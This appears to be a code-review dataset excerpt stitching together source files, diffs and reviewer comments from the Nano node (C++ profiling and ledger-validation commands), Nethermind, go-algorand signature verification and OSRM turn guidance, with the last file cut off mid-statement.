std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else { std::cout << "Not available device id\n" << std::endl; result = -1; } } else { std::cout << "Not available platform id\n" << std::endl; result = -1; } } } else { std::cout << "Error initializing OpenCL" << std::endl; result = -1; } } else if (vm.count ("debug_profile_verify")) { nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); nano::change_block block (0, 0, nano::keypair ().prv, 0, 0); std::cerr << "Starting verification profiling\n"; while (true) { block.hashables.previous.qwords[0] += 1; auto begin1 (std::chrono::high_resolution_clock::now ()); for (uint64_t t (0); t < 1000000; ++t) { block.hashables.previous.qwords[0] += 1; block.block_work_set (t); nano::work_validate (block); } auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("%|1$ 12d|\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else if (vm.count ("debug_verify_profile")) { nano::keypair key; nano::uint256_union message; nano::uint512_union signature; signature = nano::sign_message (key.prv, key.pub, message); auto begin (std::chrono::high_resolution_clock::now ()); for (auto i (0u); i < 1000; ++i) { nano::validate_message (key.pub, message, signature); } auto end (std::chrono::high_resolution_clock::now ()); std::cerr << "Signature verifications " << std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count () << std::endl; } else if (vm.count ("debug_verify_profile_batch")) { nano::keypair key; size_t batch_count (1000); nano::uint256_union message; nano::uint512_union signature (nano::sign_message (key.prv, key.pub, message)); std::vector<unsigned char const *> messages (batch_count, message.bytes.data ()); std::vector<size_t> lengths (batch_count, sizeof (message)); std::vector<unsigned char const *> pub_keys (batch_count, key.pub.bytes.data ()); std::vector<unsigned char const *> signatures (batch_count, signature.bytes.data ()); std::vector<int> verifications; verifications.resize (batch_count); auto begin (std::chrono::high_resolution_clock::now ()); nano::validate_message_batch (messages.data (), lengths.data (), pub_keys.data (), signatures.data (), batch_count, verifications.data ()); auto end (std::chrono::high_resolution_clock::now ()); std::cerr << "Batch signature verifications " << std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count () << std::endl; } else if (vm.count ("debug_profile_sign")) { std::cerr << "Starting blocks signing profiling\n"; while (true) { nano::keypair key; nano::block_hash latest (0); auto begin1 (std::chrono::high_resolution_clock::now ()); for (uint64_t balance (0); balance < 1000; ++balance) { nano::send_block send (latest, key.pub, balance, key.prv, key.pub, 0); latest = send.hash (); } auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("%|1$ 12d|\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else if (vm.count ("debug_profile_process")) { nano::network_params::set_active_network (nano::nano_networks::nano_test_network); nano::network_params test_params; nano::block_builder builder; size_t num_accounts (100000); size_t num_interations (5); // 100,000 * 5 * 2 = 1,000,000 blocks size_t max_blocks (2 * num_accounts * num_interations + num_accounts * 2); // 1,000,000 + 2* 100,000 = 1,200,000 blocks std::cerr << boost::str (boost::format ("Starting pregenerating %1% blocks\n") % max_blocks); nano::system system (24000, 1); nano::node_init init; nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); nano::logging logging; auto path (nano::unique_path ()); logging.init (path); auto node (std::make_shared<nano::node> (init, system.io_ctx, 24001, path, system.alarm, logging, work)); nano::block_hash genesis_latest (node->latest (test_params.ledger.test_genesis_key.pub)); nano::uint128_t genesis_balance (std::numeric_limits<nano::uint128_t>::max ()); // Generating keys std::vector<nano::keypair> keys (num_accounts); std::vector<nano::block_hash> frontiers (num_accounts); std::vector<nano::uint128_t> balances (num_accounts, 1000000000); // Generating blocks std::deque<std::shared_ptr<nano::block>> blocks; for (auto i (0); i != num_accounts; ++i) { genesis_balance = genesis_balance - 1000000000; auto send = builder.state () .account (test_params.ledger.test_genesis_key.pub) .previous (genesis_latest) .representative (test_params.ledger.test_genesis_key.pub) .balance (genesis_balance) .link (keys[i].pub) .sign (keys[i].prv, keys[i].pub) .work (work.generate (genesis_latest)) .build (); genesis_latest = send->hash (); blocks.push_back (std::move (send)); auto open = builder.state () .account (keys[i].pub) .previous (0) .representative (keys[i].pub) .balance (balances[i]) .link (genesis_latest) .sign (test_params.ledger.test_genesis_key.prv, test_params.ledger.test_genesis_key.pub) .work (work.generate (keys[i].pub)) .build (); frontiers[i] = open->hash (); blocks.push_back (std::move (open)); } for (auto i (0); i != num_interations; ++i) { for (auto j (0); j != num_accounts; ++j) { size_t other (num_accounts - j - 1); // Sending to other account --balances[j]; auto send = builder.state () .account (keys[j].pub) .previous (frontiers[j]) .representative (keys[j].pub) .balance (balances[j]) .link (keys[other].pub) .sign (keys[j].prv, keys[j].pub) .work (work.generate (frontiers[j])) .build (); frontiers[j] = send->hash (); blocks.push_back (std::move (send)); // Receiving ++balances[other]; auto receive = builder.state () .account (keys[other].pub) .previous (frontiers[other]) .representative (keys[other].pub) .balance (balances[other]) .link (frontiers[j]) .sign (keys[other].prv, keys[other].pub) .work (work.generate (frontiers[other])) .build (); frontiers[other] = receive->hash (); blocks.push_back (std::move (receive)); } } // Processing blocks std::cerr << boost::str (boost::format ("Starting processing %1% active blocks\n") % max_blocks); auto begin (std::chrono::high_resolution_clock::now ()); while (!blocks.empty ()) { auto block (blocks.front ()); node->process_active (block); blocks.pop_front (); } uint64_t block_count (0); while (block_count < max_blocks + 1) { std::this_thread::sleep_for (std::chrono::milliseconds (100)); auto transaction (node->store.tx_begin ()); block_count = node->store.block_count (transaction).sum (); } auto end (std::chrono::high_resolution_clock::now ()); auto time (std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count ()); node->stop (); std::cerr << boost::str (boost::format ("%|1$ 12d| us \n%2% blocks per second\n") % time % (max_blocks * 1000000 / time)); } else if (vm.count ("debug_profile_votes")) { nano::network_params::set_active_network (nano::nano_networks::nano_test_network); nano::network_params test_params; nano::block_builder builder; size_t num_elections (40000); size_t num_representatives (25); size_t max_votes (num_elections * num_representatives); // 40,000 * 25 = 1,000,000 votes std::cerr << boost::str (boost::format ("Starting pregenerating %1% votes\n") % max_votes); nano::system system (24000, 1); nano::node_init init; nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); nano::logging logging; auto path (nano::unique_path ()); logging.init (path); auto node (std::make_shared<nano::node> (init, system.io_ctx, 24001, path, system.alarm, logging, work)); nano::block_hash genesis_latest (node->latest (test_params.ledger.test_genesis_key.pub)); nano::uint128_t genesis_balance (std::numeric_limits<nano::uint128_t>::max ()); // Generating keys std::vector<nano::keypair> keys (num_representatives); nano::uint128_t balance ((node->config.online_weight_minimum.number () / num_representatives) + 1); for (auto i (0); i != num_representatives; ++i) { auto transaction (node->store.tx_begin_write ()); genesis_balance = genesis_balance - balance; auto send = builder.state () .account (test_params.ledger.test_genesis_key.pub) .previous (genesis_latest) .representative (test_params.ledger.test_genesis_key.pub) .balance (genesis_balance) .link (keys[i].pub) .sign (test_params.ledger.test_genesis_key.prv, test_params.ledger.test_genesis_key.pub) .work (work.generate (genesis_latest)) .build (); genesis_latest = send->hash (); node->ledger.process (transaction, *send); auto open = builder.state () .account (keys[i].pub) .previous (0) .representative (keys[i].pub) .balance (balance) .link (genesis_latest) .sign (keys[i].prv, keys[i].pub) .work (work.generate (keys[i].pub)) .build (); node->ledger.process (transaction, *open); } // Generating blocks std::deque<std::shared_ptr<nano::block>> blocks; for (auto i (0); i != num_elections; ++i) { genesis_balance = genesis_balance - 1; nano::keypair destination; auto send = builder.state () .account (test_params.ledger.test_genesis_key.pub) .previous (genesis_latest) .representative (test_params.ledger.test_genesis_key.pub) .balance (genesis_balance) .link (destination.pub) .sign (test_params.ledger.test_genesis_key.prv, test_params.ledger.test_genesis_key.pub) .work (work.generate (genesis_latest)) .build (); genesis_latest = send->hash (); blocks.push_back (std::move (send)); } // Generating votes std::deque<std::shared_ptr<nano::vote>> votes; for (auto j (0); j != num_representatives; ++j) { uint64_t sequence (1); for (auto & i : blocks) { auto vote (std::make_shared<nano::vote> (keys[j].pub, keys[j].prv, sequence, std::vector<nano::block_hash> (1, i->hash ()))); votes.push_back (vote); sequence++; } } // Processing block & start elections while (!blocks.empty ()) { auto block (blocks.front ()); node->process_active (block); blocks.pop_front (); } node->block_processor.flush (); // Processing votes std::cerr << boost::str (boost::format ("Starting processing %1% votes\n") % max_votes); auto begin (std::chrono::high_resolution_clock::now ()); while (!votes.empty ()) { auto vote (votes.front ()); node->vote_processor.vote (vote, node->network.endpoint ()); votes.pop_front (); } while (!node->active.empty ()) { std::this_thread::sleep_for (std::chrono::milliseconds (100)); } auto end (std::chrono::high_resolution_clock::now ()); auto time (std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count ()); node->stop (); std::cerr << boost::str (boost::format ("%|1$ 12d| us \n%2% votes per second\n") % time % (max_votes * 1000000 / time)); } else if (vm.count ("debug_random_feed")) { /* * This command redirects an infinite stream of bytes from the random pool to standard out. * The result can be fed into various tools for testing RNGs and entropy pools. * * Example, running the entire dieharder test suite: * * ./nano_node --debug_random_feed | dieharder -a -g 200 */ nano::raw_key seed; for (;;) { nano::random_pool::generate_block (seed.data.bytes.data (), seed.data.bytes.size ()); std::cout.write (reinterpret_cast<const char *> (seed.data.bytes.data ()), seed.data.bytes.size ()); } } else if (vm.count ("debug_rpc")) { std::string rpc_input_l; std::ostringstream command_l; while (std::cin >> rpc_input_l) { command_l << rpc_input_l; } auto response_handler_l ([](boost::property_tree::ptree const & tree_a) { boost::property_tree::write_json (std::cout, tree_a); // Terminate as soon as we have the result, even if background threads (like work generation) are running. std::exit (0); }); nano::inactive_node inactive_node_l (data_path); nano::rpc_config rpc_config_l; rpc_config_l.enable_control = true; std::unique_ptr<nano::rpc> rpc_l = get_rpc (inactive_node_l.node->io_ctx, *inactive_node_l.node, rpc_config_l); std::string req_id_l ("1"); nano::rpc_handler handler_l (*inactive_node_l.node, *rpc_l, command_l.str (), req_id_l, response_handler_l); handler_l.process_request (); } else if (vm.count ("debug_validate_blocks")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); std::cerr << boost::str (boost::format ("Performing blocks hash, signature, work validation...\n")); size_t count (0); for (auto i (node.node->store.latest_begin (transaction)), n (node.node->store.latest_end ()); i != n; ++i) { ++count; if ((count % 20000) == 0) { std::cout << boost::str (boost::format ("%1% accounts validated\n") % count); } nano::account_info info (i->second); nano::account account (i->first); auto hash (info.open_block); nano::block_hash calculated_hash (0); nano::block_sideband sideband; uint64_t height (0); uint64_t previous_timestamp (0); while (!hash.is_zero ()) { // Retrieving block data auto block (node.node->store.block_get (transaction, hash, &sideband)); // Check for state & open blocks if account field is correct if (block->type () == nano::block_type::open || block->type () == nano::block_type::state) { if (block->account () != account) { std::cerr << boost::str (boost::format ("Incorrect account field for block %1%\n") % hash.to_string ()); } } // Check if sideband account is correct else if (sideband.account != account) { std::cerr << boost::str (boost::format ("Incorrect sideband account for block %1%\n") % hash.to_string ()); } // Check if previous field is correct if (calculated_hash != block->previous ()) { std::cerr << boost::str (boost::format ("Incorrect previous field for block %1%\n") % hash.to_string ()); } // Check if block data is correct (calculating hash) calculated_hash = block->hash (); if (calculated_hash != hash) { std::cerr << boost::str (boost::format ("Invalid data inside block %1% calculated hash: %2%\n") % hash.to_string () % calculated_hash.to_string ()); } // Check if block signature is correct if (validate_message (account, hash, block->block_signature ())) { bool invalid (true); // Epoch blocks if (!node.node->ledger.epoch_link.is_zero () && block->type () == nano::block_type::state) { auto & state_block (static_cast<nano::state_block &> (*block.get ())); nano::amount prev_balance (0); if (!state_block.hashables.previous.is_zero ()) { prev_balance = node.node->ledger.balance (transaction, state_block.hashables.previous); } if (node.node->ledger.is_epoch_link (state_block.hashables.link) && state_block.hashables.balance == prev_balance) { invalid = validate_message (node.node->ledger.epoch_signer, hash, block->block_signature ()); } } if (invalid) { std::cerr << boost::str (boost::format ("Invalid signature for block %1%\n") % hash.to_string ()); } } // Check if block work value is correct if (nano::work_validate (*block.get ())) { std::cerr << boost::str (boost::format ("Invalid work for block %1% value: %2%\n") % hash.to_string () % nano::to_string_hex (block->block_work ())); } // Check if sideband height is correct ++height; if (sideband.height != height) { std::cerr << boost::str (boost::format ("Incorrect sideband height for block %1%. Sideband: %2%. Expected: %3%\n") % hash.to_string () % sideband.height % height); } // Check if sideband timestamp is after previous timestamp if (sideband.timestamp < previous_timestamp) { std::cerr << boost::str (boost::format ("Incorrect sideband timestamp for block %1%\n") % hash.to_string ()); } previous_timestamp = sideband.timestamp; // Retrieving successor block hash hash = node.node->store.block_successor (transaction, hash); } if (info.block_count != height) { std::cerr << boost::str (boost::format ("Incorrect block count for account %1%. Actual: %2%. Expected: %3%\n") % account.to_account () % height % info.block_count); } if (info.head != calculated_hash) { std::cerr << boost::str (boost::format ("Incorrect frontier for account %1%. Actual: %2%. Expected: %3%\n") % account.to_account () % calculated_hash.to_string () % info.head.to_string ()); } } std::cout << boost::str (boost::format ("%1% accounts validated\n") % count); count = 0; for (auto i (node.node->store.pending_begin (transaction)), n (node.node->store.pending_end ()); i != n; ++i) { ++count; if ((count % 50000) == 0) { std::cout << boost::str (boost::format ("%1% pending blocks validated\n") % count); } nano::pending_key key (i->first); nano::pending_info info (i->second); // Check block existance auto block (node.node->store.block_get (transaction, key.hash)); if (block == nullptr) { std::cerr << boost::str (boost::format ("Pending block not existing %1%\n") % key.hash.to_string ()); } else { // Check if pending destination is correct nano::account destination (0); if (auto state = dynamic_cast<nano::state_block *> (block.get ())) { if (node.node->ledger.is_send (transaction, *state)) { destination = state->hashables.link; } } else if (auto send = dynamic_cast<nano::send_block *> (block.get ())) { destination = send->hashables.destination; } else { std::cerr << boost::str (boost::format ("Incorrect type for pending block %1%\n") % key.hash.to_string ()); } if (key.account != destination) { std::cerr << boost::str (boost::format ("Incorrect destination for pending block %1%\n") % key.hash.to_string ()); } // Check if pending source is correct auto account (node.node->ledger.account (transaction, key.hash)); if (info.source != account) { std::cerr << boost::str (boost::format ("Incorrect source for pending block %1%\n") % key.hash.to_string ()); } // Check if pending amount is correct auto amount (node.node->ledger.amount (transaction, key.hash)); if (info.amount != amount) { std::cerr << boost::str (boost::format ("Incorrect amount for pending block %1%\n") % key.hash.to_string ()); } } } std::cout << boost::str (boost::format ("%1% pending blocks validated\n") % count); } else if (vm.count ("debug_profile_bootstrap")) { nano::inactive_node node2 (nano::unique_path (), 24001); node2.node->flags.fast_bootstrap = (vm.count ("fast_bootstrap") > 0); nano::genesis genesis; auto begin (std::chrono::high_resolution_clock::now ()); uint64_t block_count (0); size_t count (0); { nano::inactive_node node (data_path, 24000); auto transaction (node.node->store.tx_begin ()); block_count = node.node->store.block_count (transaction).sum (); std::cout << boost::str (boost::format ("Performing bootstrap emulation, %1% blocks in ledger...") % block_count) << std::endl; for (auto i (node.node->store.latest_begin (transaction)), n (node.node->store.latest_end ()); i != n; ++i) { nano::account account (i->first); nano::account_info info (i->second); auto hash (info.head); while (!hash.is_zero ()) { // Retrieving block data auto block (node.node->store.block_get (transaction, hash)); if (block != nullptr) { ++count; if ((count % 100000) == 0) { std::cout << boost::str (boost::format ("%1% blocks retrieved") % count) << std::endl; } nano::unchecked_info unchecked_info (block, account, 0, nano::signature_verification::unknown); node2.node->block_processor.add (unchecked_info); // Retrieving previous block hash hash = block->previous (); } } } } count = 0; uint64_t block_count_2 (0); while (block_count_2 != block_count) { std::this_thread::sleep_for (std::chrono::seconds (1)); auto transaction_2 (node2.node->store.tx_begin ()); block_count_2 = node2.node->store.block_count (transaction_2).sum (); if ((count % 60) == 0) { std::cout << boost::str (boost::format ("%1% (%2%) blocks processed") % block_count_2 % node2.node->store.unchecked_count (transaction_2)) << std::endl; } count++; } auto end (std::chrono::high_resolution_clock::now ()); auto time (std::chrono::duration_cast<std::chrono::microseconds> (end - begin).count ()); auto seconds (time / 1000000); nano::remove_temporary_directories (); std::cout << boost::str (boost::format ("%|1$ 12d| seconds \n%2% blocks per second") % seconds % (block_count / seconds)) << std::endl; } else if (vm.count ("debug_peers")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); for (auto i (node.node->store.peers_begin (transaction)), n (node.node->store.peers_end ()); i != n; ++i) { std::cout << boost::str (boost::format ("%1%\n") % nano::endpoint (boost::asio::ip::address_v6 (i->first.address_bytes ()), i->first.port ())); } } else if (vm.count ("version")) { if (NANO_VERSION_PATCH == 0) { std::cout << "Version " << NANO_MAJOR_MINOR_VERSION << std::endl; } else { std::cout << "Version " << NANO_MAJOR_MINOR_RC_VERSION << std::endl; } } else { std::cout << description << std::endl; result = -1; } } return result; }
1
15,140
"default 65536" Not sure if it's important to state, but block_processor_full_size has a different default for fast_bootstrap.
nanocurrency-nano-node
cpp
@@ -23,5 +23,6 @@ namespace Nethermind.TxPool public uint FutureNonceRetention { get; set; } = 16; public int HashCacheSize { get; set; } = 512 * 1024; public long? GasLimit { get; set; } = null; + } }
1
// Copyright (c) 2021 Demerzel Solutions Limited // This file is part of the Nethermind library. // // The Nethermind library is free software: you can redistribute it and/or modify // it under the terms of the GNU Lesser General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // The Nethermind library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Lesser General Public License for more details. // // You should have received a copy of the GNU Lesser General Public License // along with the Nethermind. If not, see <http://www.gnu.org/licenses/>. namespace Nethermind.TxPool { public class TxPoolConfig : ITxPoolConfig { public int PeerNotificationThreshold { get; set; } = 5; public int Size { get; set; } = 2048; public uint FutureNonceRetention { get; set; } = 16; public int HashCacheSize { get; set; } = 512 * 1024; public long? GasLimit { get; set; } = null; } }
1
25,415
remove unnecessary whitespace changes
NethermindEth-nethermind
.cs
@@ -46,10 +46,6 @@ func TxnPool(s *transactions.SignedTxn, spec transactions.SpecialAddresses, prot return errors.New("empty address") } - if s.Sig != (crypto.Signature{}) && !s.Msig.Blank() { - return errors.New("signedtxn should only have one of Sig or Msig") - } - outCh := make(chan error, 1) cx := asyncVerifyContext{s, outCh, &proto} verificationPool.EnqueueBacklog(context.Background(), stxnAsyncVerify, &cx, nil)
1
// Copyright (C) 2019 Algorand, Inc. // This file is part of go-algorand // // go-algorand is free software: you can redistribute it and/or modify // it under the terms of the GNU Affero General Public License as // published by the Free Software Foundation, either version 3 of the // License, or (at your option) any later version. // // go-algorand is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU Affero General Public License for more details. // // You should have received a copy of the GNU Affero General Public License // along with go-algorand. If not, see <https://www.gnu.org/licenses/>. package verify import ( "context" "encoding/binary" "errors" "fmt" "github.com/algorand/go-algorand/config" "github.com/algorand/go-algorand/crypto" "github.com/algorand/go-algorand/data/basics" "github.com/algorand/go-algorand/data/transactions" "github.com/algorand/go-algorand/data/transactions/logic" "github.com/algorand/go-algorand/util/execpool" ) // TxnPool verifies that a SignedTxn has a good signature and that the underlying // transaction is properly constructed. // Note that this does not check whether a payset is valid against the ledger: // a SignedTxn may be well-formed, but a payset might contain an overspend. // // This version of verify is performing the verification over the provided execution pool. func TxnPool(s *transactions.SignedTxn, spec transactions.SpecialAddresses, proto config.ConsensusParams, verificationPool execpool.BacklogPool) error { if err := s.Txn.WellFormed(spec, proto); err != nil { return err } zeroAddress := basics.Address{} if s.Txn.Src() == zeroAddress { return errors.New("empty address") } if s.Sig != (crypto.Signature{}) && !s.Msig.Blank() { return errors.New("signedtxn should only have one of Sig or Msig") } outCh := make(chan error, 1) cx := asyncVerifyContext{s, outCh, &proto} verificationPool.EnqueueBacklog(context.Background(), stxnAsyncVerify, &cx, nil) if err, hasErr := <-outCh; hasErr { return err } return nil } // Txn verifies a SignedTxn as being signed and having no obviously inconsistent data. // Block-assembly time checks of LogicSig and accounting rules may still block the txn. func Txn(s *transactions.SignedTxn, spec transactions.SpecialAddresses, proto config.ConsensusParams) error { if err := s.Txn.WellFormed(spec, proto); err != nil { return err } zeroAddress := basics.Address{} if s.Txn.Src() == zeroAddress { return errors.New("empty address") } return stxnVerifyCore(s, &proto) } type asyncVerifyContext struct { s *transactions.SignedTxn outCh chan error proto *config.ConsensusParams } func stxnAsyncVerify(arg interface{}) interface{} { cx := arg.(*asyncVerifyContext) err := stxnVerifyCore(cx.s, cx.proto) if err != nil { cx.outCh <- err } else { close(cx.outCh) } return nil } func stxnVerifyCore(s *transactions.SignedTxn, proto *config.ConsensusParams) error { numSigs := 0 hasSig := false hasMsig := false hasLogicSig := false if s.Sig != (crypto.Signature{}) { numSigs++ hasSig = true } if !s.Msig.Blank() { numSigs++ hasMsig = true } if !s.Lsig.Blank() { numSigs++ hasLogicSig = true } if numSigs == 0 { return errors.New("signedtxn has no sig") } if numSigs > 1 { return errors.New("signedtxn should only have one of Sig or Msig or LogicSig") } if hasSig { if crypto.SignatureVerifier(s.Txn.Src()).Verify(s.Txn, s.Sig) { return nil } return errors.New("signature validation failed") } if hasMsig { if ok, _ := crypto.MultisigVerify(s.Txn, crypto.Digest(s.Txn.Src()), s.Msig); ok { return nil } return errors.New("multisig validation failed") } if hasLogicSig { return LogicSig(&s.Lsig, proto, s) } return errors.New("has one mystery sig. WAT?") } // LogicSig checks that the signature is valid and that the program is basically well formed. // It does not evaluate the logic. func LogicSig(lsig *transactions.LogicSig, proto *config.ConsensusParams, stxn *transactions.SignedTxn) error { if len(lsig.Logic) == 0 { return errors.New("LogicSig.Logic empty") } version, vlen := binary.Uvarint(lsig.Logic) if vlen <= 0 { return errors.New("LogicSig.Logic bad version") } if version > proto.LogicSigVersion { return errors.New("LogicSig.Logic version too new") } if uint64(lsig.Len()) > proto.LogicSigMaxSize { return errors.New("LogicSig.Logic too long") } ep := logic.EvalParams{Txn: stxn, Proto: proto} cost, err := logic.Check(lsig.Logic, ep) if err != nil { return err } if cost > int(proto.LogicSigMaxCost) { return fmt.Errorf("LogicSig.Logic too slow, %d > %d", cost, proto.LogicSigMaxCost) } hasSig := false hasMsig := false numSigs := 0 if lsig.Sig != (crypto.Signature{}) { hasSig = true numSigs++ } if !lsig.Msig.Blank() { hasMsig = true numSigs++ } if numSigs == 0 { // if the txn.Sender == hash(Logic) then this is a (potentially) valid operation on a contract-only account program := transactions.Program(lsig.Logic) lhash := crypto.HashObj(&program) if crypto.Digest(stxn.Txn.Sender) == lhash { return nil } return errors.New("LogicNot signed and not a Logic-only account") } if numSigs > 1 { return errors.New("LogicSig should only have one of Sig or Msig but has more than one") } if hasSig { program := transactions.Program(lsig.Logic) if crypto.SignatureVerifier(stxn.Txn.Src()).Verify(&program, lsig.Sig) { return nil } return errors.New("logic signature validation failed") } if hasMsig { program := transactions.Program(lsig.Logic) if ok, _ := crypto.MultisigVerify(&program, crypto.Digest(stxn.Txn.Src()), lsig.Msig); ok { return nil } return errors.New("logic multisig validation failed") } return errors.New("inconsistent internal state verifying LogicSig") }
1
36,470
Are these conditions covered elsewhere ?
algorand-go-algorand
go
@@ -59,7 +59,14 @@ TurnType::Enum IntersectionHandler::findBasicTurnType(const EdgeID via_edge, if (!on_ramp && onto_ramp) return TurnType::OnRamp; - if (in_data.name_id == out_data.name_id && in_data.name_id != EMPTY_NAMEID) + const auto same_name = + !util::guidance::requiresNameAnnounced(name_table.GetNameForID(in_data.name_id), + name_table.GetRefForID(in_data.name_id), + name_table.GetNameForID(out_data.name_id), + name_table.GetRefForID(out_data.name_id), + street_name_suffix_table); + + if (in_data.name_id != EMPTY_NAMEID && out_data.name_id != EMPTY_NAMEID && same_name) { return TurnType::Continue; }
1
#include "extractor/guidance/intersection_handler.hpp" #include "extractor/guidance/constants.hpp" #include "extractor/guidance/toolkit.hpp" #include "util/coordinate_calculation.hpp" #include "util/guidance/toolkit.hpp" #include "util/simple_logger.hpp" #include <algorithm> #include <cstddef> using EdgeData = osrm::util::NodeBasedDynamicGraph::EdgeData; using osrm::util::guidance::getTurnDirection; namespace osrm { namespace extractor { namespace guidance { namespace detail { inline bool requiresAnnouncement(const EdgeData &from, const EdgeData &to) { return !from.CanCombineWith(to); } } IntersectionHandler::IntersectionHandler(const util::NodeBasedDynamicGraph &node_based_graph, const std::vector<QueryNode> &node_info_list, const util::NameTable &name_table, const SuffixTable &street_name_suffix_table, const IntersectionGenerator &intersection_generator) : node_based_graph(node_based_graph), node_info_list(node_info_list), name_table(name_table), street_name_suffix_table(street_name_suffix_table), intersection_generator(intersection_generator) { } std::size_t IntersectionHandler::countValid(const Intersection &intersection) const { return std::count_if(intersection.begin(), intersection.end(), [](const ConnectedRoad &road) { return road.entry_allowed; }); } TurnType::Enum IntersectionHandler::findBasicTurnType(const EdgeID via_edge, const ConnectedRoad &road) const { const auto &in_data = node_based_graph.GetEdgeData(via_edge); const auto &out_data = node_based_graph.GetEdgeData(road.eid); bool on_ramp = in_data.road_classification.IsRampClass(); bool onto_ramp = out_data.road_classification.IsRampClass(); if (!on_ramp && onto_ramp) return TurnType::OnRamp; if (in_data.name_id == out_data.name_id && in_data.name_id != EMPTY_NAMEID) { return TurnType::Continue; } return TurnType::Turn; } TurnInstruction IntersectionHandler::getInstructionForObvious(const std::size_t num_roads, const EdgeID via_edge, const bool through_street, const ConnectedRoad &road) const { const auto type = findBasicTurnType(via_edge, road); // handle travel modes: const auto in_mode = node_based_graph.GetEdgeData(via_edge).travel_mode; const auto out_mode = node_based_graph.GetEdgeData(road.eid).travel_mode; if (type == TurnType::OnRamp) { return {TurnType::OnRamp, getTurnDirection(road.angle)}; } if (angularDeviation(road.angle, 0) < 0.01) { return {TurnType::Turn, DirectionModifier::UTurn}; } if (type == TurnType::Turn) { const auto &in_data = node_based_graph.GetEdgeData(via_edge); const auto &out_data = node_based_graph.GetEdgeData(road.eid); if (in_data.name_id != out_data.name_id && util::guidance::requiresNameAnnounced(name_table.GetNameForID(in_data.name_id), name_table.GetRefForID(in_data.name_id), name_table.GetNameForID(out_data.name_id), name_table.GetRefForID(out_data.name_id), street_name_suffix_table)) { // obvious turn onto a through street is a merge if (through_street) { // We reserve merges for motorway types. All others are considered for simply going // straight onto a road. This avoids confusion about merge directions on streets // that could potentially also offer different choices if (out_data.road_classification.IsMotorwayClass()) return {TurnType::Merge, road.angle > STRAIGHT_ANGLE ? DirectionModifier::SlightRight : DirectionModifier::SlightLeft}; else if (in_data.road_classification.IsRampClass() && out_data.road_classification.IsRampClass()) { // This check is more a precaution than anything else. Our current travel modes // cannot reach this, since all ramps are exposing the same travel type. But we // could see toll-type at some point. return {in_mode == out_mode ? TurnType::Suppressed : TurnType::Notification, getTurnDirection(road.angle)}; } else { const double constexpr MAX_COLLAPSE_DISTANCE = 30; // in normal road condidtions, we check if the turn is nearly straight. // Doing so, we widen the angle that a turn is considered straight, but since it // is obvious, the choice is arguably better. // FIXME this requires https://github.com/Project-OSRM/osrm-backend/pull/2399, // since `distance` does not refer to an actual distance but rather to the // duration/weight of the traversal. We can only approximate the distance here // or actually follow the full road. When 2399 lands, we can exchange here for a // precalculated distance value. const auto distance = util::coordinate_calculation::haversineDistance( node_info_list[node_based_graph.GetTarget(via_edge)], node_info_list[node_based_graph.GetTarget(road.eid)]); return { TurnType::Turn, (angularDeviation(road.angle, STRAIGHT_ANGLE) < FUZZY_ANGLE_DIFFERENCE || distance > 2 * MAX_COLLAPSE_DISTANCE) ? DirectionModifier::Straight : getTurnDirection(road.angle)}; } } else { return {in_mode == out_mode ? TurnType::NewName : TurnType::Notification, getTurnDirection(road.angle)}; } } // name has not changed, suppress a turn here or indicate mode change else { return {in_mode == out_mode ? TurnType::Suppressed : TurnType::Notification, getTurnDirection(road.angle)}; } } BOOST_ASSERT(type == TurnType::Continue); if (in_mode != out_mode) { return {TurnType::Notification, getTurnDirection(road.angle)}; } if (num_roads > 2) { return {TurnType::Suppressed, getTurnDirection(road.angle)}; } else { return {TurnType::NoTurn, getTurnDirection(road.angle)}; } } void IntersectionHandler::assignFork(const EdgeID via_edge, ConnectedRoad &left, ConnectedRoad &right) const { const auto &in_data = node_based_graph.GetEdgeData(via_edge); const bool low_priority_left = node_based_graph.GetEdgeData(left.eid).road_classification.IsLowPriorityRoadClass(); const bool low_priority_right = node_based_graph.GetEdgeData(right.eid).road_classification.IsLowPriorityRoadClass(); if ((angularDeviation(left.angle, STRAIGHT_ANGLE) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && angularDeviation(right.angle, STRAIGHT_ANGLE) > FUZZY_ANGLE_DIFFERENCE)) { // left side is actually straight const auto &out_data = node_based_graph.GetEdgeData(left.eid); if (detail::requiresAnnouncement(in_data, out_data)) { if (low_priority_right && !low_priority_left) { left.instruction = getInstructionForObvious(3, via_edge, false, left); right.instruction = {findBasicTurnType(via_edge, right), DirectionModifier::SlightRight}; } else { if (low_priority_left && !low_priority_right) { left.instruction = {findBasicTurnType(via_edge, left), DirectionModifier::SlightLeft}; right.instruction = {findBasicTurnType(via_edge, right), DirectionModifier::SlightRight}; } else { left.instruction = {TurnType::Fork, DirectionModifier::SlightLeft}; right.instruction = {TurnType::Fork, DirectionModifier::SlightRight}; } } } else { left.instruction = {TurnType::Suppressed, DirectionModifier::Straight}; right.instruction = {findBasicTurnType(via_edge, right), DirectionModifier::SlightRight}; } } else if (angularDeviation(right.angle, STRAIGHT_ANGLE) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && angularDeviation(left.angle, STRAIGHT_ANGLE) > FUZZY_ANGLE_DIFFERENCE) { // right side is actually straight const auto &out_data = node_based_graph.GetEdgeData(right.eid); if (angularDeviation(right.angle, STRAIGHT_ANGLE) < MAXIMAL_ALLOWED_NO_TURN_DEVIATION && angularDeviation(left.angle, STRAIGHT_ANGLE) > FUZZY_ANGLE_DIFFERENCE) { if 